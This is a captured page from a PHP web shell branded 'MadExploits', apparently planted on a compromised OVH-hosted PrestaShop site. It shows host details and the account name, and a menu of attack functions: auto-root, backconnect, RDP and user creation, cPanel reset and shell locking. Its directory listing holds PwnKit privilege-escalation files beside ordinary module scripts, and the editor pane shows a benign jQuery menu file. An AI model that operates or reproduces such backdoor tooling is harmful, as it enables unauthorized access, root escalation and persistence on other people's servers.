Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
modules /
spverticalmenu /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
form.js
4.45
KB
-rw----r--
index.php
1.26
KB
-rw----r--
jquery.nestable.js
17.54
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
spverticalmenu.js
0
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : form.js
jQuery(document).ready(function(){ eventSelectMenu(); eventSelectWidth(); $("#select_menu").change(function(){ eventSelectMenu(); }); $("#sub_menu").change(function(){ eventSelectWidth(); }); $('#spverticalmenu').nestable({ listNodeName : 'ol', itemNodeName : 'li', rootClass : 'spmenu', listClass : 'spmenu-list', itemClass : 'spmenu-item', dragClass : 'spmenu-dragel', handleClass : 'spmenu-handle', collapsedClass : 'spmenu-collapsed', placeClass : 'spmenu-placeholder', noDragClass : 'spmenu-nodrag', emptyClass : 'spmenu-empty', group : 0, expandBtnHTML : '<button data-action="expand" type="button">Expand</button>', collapseBtnHTML : '<button data-action="collapse" type="button">Collapse</button>', }); $('#savePosition').click(function(){ serialized = JSON.stringify( $('#spverticalmenu').nestable('serialize')); var $this = $(this); $.ajax({ type: 'POST', url: action+"&rand="+Math.random(), data : 'serialized='+serialized+'&savePosition=1' }).done( function () { $this.val( 'Update Sucess' ); location.reload(); }); }); $('#spverticalmenu-menu').on('click', function(e) { var target = $(e.target), action = target.data('action'); if (action === 'expand-all') { $('.spmenu').nestable('expandAll'); } if (action === 'collapse-all') { $('.spmenu').nestable('collapseAll'); } }); $(".remove-menu").click( function(){ var check = confirm('Are you sure you want to delete this?'); if(check == true) return true; else return false; }); $(".duplicate-menu").click( function(){ var check = confirm('Are you sure you want to duplicate this?'); if(check == true) return true; else return false; }); }); function eventSelectMenu() { $(".type_group").parent().parent().hide(); $("#type_subcategories").closest('.panel').parent().parent().hide(); $(".showimg_subcategories").parent().parent().hide(); $(".showimgchild_subcategories").parent().parent().hide(); $(".type_limit_subcategories").closest('.form-group').hide(); $(".type_product_type").closest('.form-group').hide(); $("#type_limit_product").closest('.form-group').hide(); var val = $( "#select_menu option:selected" ).val(); if($("[id^=type_url_]").closest('.form-group').find('.translatable-field').length){ $("[id^=type_url_]").closest('.form-group').parent().parent().hide(); $(".html_lang").closest('.form-group').parent().parent().hide(); if(val == 'url') $("[id^=type_url_]").closest('.form-group').parent().parent().show(); else if(val == 'html') $(".html_lang").closest('.form-group').parent().parent().show(); else if(val == 'subcategories'){ $("#type_subcategories").closest('.panel').parent().parent().show(); $(".type_limit_subcategories").closest('.form-group').show(); $(".showimg_subcategories").parent().parent().show(); $(".showimgchild_subcategories").parent().parent().show(); } else if(val == 'productlist'){ $(".type_product_type").parent().parent().show(); $(".type_productlist_type").parent().parent().show(); $("#type_limit_product").parent().parent().show(); } else{ $("#type_"+val).parent().parent().show(); $(".type_"+val).parent().parent().show(); } } else{ $("[id^=type_url_]").closest('.form-group').hide(); $(".html_lang").closest('.form-group').hide(); if(val == 'url') $("[id^=type_url_]").closest('.form-group').show(); else if(val == 'productlist'){ $(".type_product_type").closest('.form-group').show(); $(".type_productlist_type").closest('.form-group').show(); $("#type_limit_product").closest('.form-group').show(); } else if(val == 'subcategories'){ $("#type_subcategories").closest('.panel').parent().parent().show(); $(".type_limit_subcategories").closest('.form-group').show(); $(".showimg_subcategories").parent().parent().show(); $(".showimgchild_subcategories").parent().parent().show(); } else if(val == 'html') $(".html_lang").closest('.form-group').show(); else{ $("#type_"+val).parent().parent().show(); $(".type_"+val).parent().parent().show(); } } } function eventSelectWidth() { $(".sub_width").parent().parent().hide(); var val = $( "#sub_menu option:selected" ).val(); if(val == 'yes'){ $(".sub_width").parent().parent().show(); } }
Close